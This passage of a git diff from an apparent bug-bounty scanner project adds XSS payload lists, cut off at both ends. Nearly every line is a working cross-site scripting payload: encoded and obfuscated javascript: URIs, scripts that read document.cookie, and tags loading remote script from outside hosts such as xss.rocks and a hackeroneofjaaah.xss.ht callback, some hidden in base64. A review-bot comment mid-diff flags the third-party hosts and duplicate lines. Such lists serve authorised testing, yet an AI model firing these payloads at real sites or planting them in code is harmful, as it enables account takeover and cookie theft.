SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<img src=x 
onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041"> +<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> +<IMG onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\> +\<a onmouseover=alert(document.cookie)\>xxs link\</a\> +\<a onmouseover="alert(document.cookie)"\>xxs link\</a\> +<IMG SRC=`javascript:alert("Soufiane says, 'XSS'")`> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC="javascript:alert('XSS');"> +javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> +<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT> +%C0%BCscript%C0%A0src%C0%BD%C0%82mymethod%C0%A8%C0%A9%C0%82%C0%A0%C0%AF%C0%BE diff --git a/bounty_drive/attacks/xss/payloads/XSS-Jhaddix.txt b/bounty_drive/attacks/xss/payloads/XSS-Jhaddix.txt new file mode 100644 index 0000000..7c0e3e3 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Jhaddix.txt 
@@ -0,0 +1,110 @@ +'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E +<<scr\0ipt/src=http://xss.com/xss.js></script +%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E +' onmouseover=alert(/XSS/) +"><iframe%20src="http://google.com"%%203E +'<script>window.onload=function(){document.forms[0].message.value='1';}</script> +x”</title><img src%3dx onerror%3dalert(1)> +<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> +<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> +<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> +<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> +<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> +<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> +<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> +<%73%63%72%69%70%74> 
%64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> +<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> +<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> +<script>alert(document.head.innerHTML.substr(146,20));</script> +<script>alert(document.head.childNodes[3].text)</script> +<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> +<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> 
+<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> +<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> +<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> +<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> +<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> +<script> function b() { 
return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> +<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # +<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # +<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># +<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 +<script for=document event=onreadystatechange>getElementById('safe123').click()</script> +<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> +<script> location.href = 
'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> +<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { 
alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> +<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> +<script>function x(window) { 
eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E +<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> +<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E +<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b 
name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> +<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> +<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? +<var onmouseover="prompt(1)">On Mouse Over</var>? 
+<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=``<div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>? +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? 
+<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ???????????? +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script ? +<img src ?itworksonchrome?\/onerror = alert(1)??? +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ? +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? 
+<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +"><img src=x onerror=prompt(1);> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-OFJAAAH.txt b/bounty_drive/attacks/xss/payloads/XSS-OFJAAAH.txt new file mode 100644 index 0000000..849f1c4 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-OFJAAAH.txt 
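Review bot: Many entries in the new XSS-Jhaddix.txt hard-code hosts this project does not control (`xss.com/xss.js`, `xssme.html5sec.org/xssme2`, the `corkami.googlecode.com` PDF, `jsfiddle.net/XLE63/`, `businessinfo.co.uk/labs/xss/xss.swf`). If one of these renders in a tested page, the content that runs is chosen by whoever holds that domain today, which presumably falls outside what a bounty program authorises. I would drop those entries, or move them to a separate list that the scanner skips unless the operator enables it, and state in the file's documentation that the default list makes no third-party requests. The same applies to the `xss.rocks` and `ha.ckers.org` entries in the preceding payload file and to the `hackeroneofjaaah.xss.ht` entries at the start of XSS-OFJAAAH.txt, which look like someone else's callback endpoint; both of those hunks extend beyond what is shown here. The list also repeats lines verbatim (the `<iframe onload=%22write(...` and `<textarea id=ta></textarea>` entries each appear twice), so de-duplicating it would avoid sending identical requests.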
@@ -0,0 +1,2976 @@ +: \');confirm(1);// +<x/onmouSeenter=window[`\x61\x6c\x65\x72\x74`]`1337` +<script>prompt(1)</script> +<script>confirm(1)</script> +<script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script> +<script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script> +<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script> +<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script> <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script> +<script>'str1ng'.replace(/1/,alert)</script> <script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script> <script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script> +<script>eval('\\u'+'0061'+'lert(1)')</script> <script>throw~delete~typeof~prompt(1)</script> <script>delete[a=alert]/prompt a(1)</script> <script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script> <script>(()=>{return this})().alert(1)</script> +<script>new function(){new.target.constructor('alert(1)')();}</script> <script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script> +<link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg> +<link rel="import" href="data:x,<script>alert(1)</script> <script>Array.from1${alert}3${window}2</script> +<script>!{x(){alert(1)}}.x()</script> <script>Array.from${eval}alert\1\``</script> <script>Array.from([1],alert)</script> <script>Promise.reject("1").then(null,alert)</script> +<svg </onload ="1> (_=alert,_(1)) ""> +javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> +<marquee loop=1 width=0 
onfinish=alert(1)> +<p onbeforescriptexecute="alert(1)"><svg><script>\</p> +<img onerror=alert(1) src <u></u> <videogt;<source onerror=javascript:prompt(911)gt; +<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a> +<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)"> +<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> < +<script> +${``[class extends[alert``]{}]} +</script> <script>[class extends[alert``]{}]</script> +<script>throw new class extends Function{}('alert(1)')``</script> <script>x=new class extends Function{}('alert(1)'); x=new x;</script> <script>new class extends alert(1){}</script> +<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script> +<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script> <script src=data:,\u006fnerror=\u0061lert(1)></script> +"><svg><script/xlink:href="data:,alert(1) <svg><script/xlink:href=data:,alert(1)></script> <frameset/onpageshow=alert(1)> +<div onactivate=alert('Xss') id=xss style=overflow:scroll> +<div onfocus=alert('xx') id=xss style=display:table> +"><script src=https://hackeroneofjaaah.xss.ht></script> +javascript:eval('var a=document.createElement(\'script\');a.src=\'https://hackeroneofjaaah.xss.ht\';document.body.appendChild(a)') +"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2Vyb25lb2ZqYWFhaC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> +"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2Vyb25lb2ZqYWFhaC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> +"><iframe 
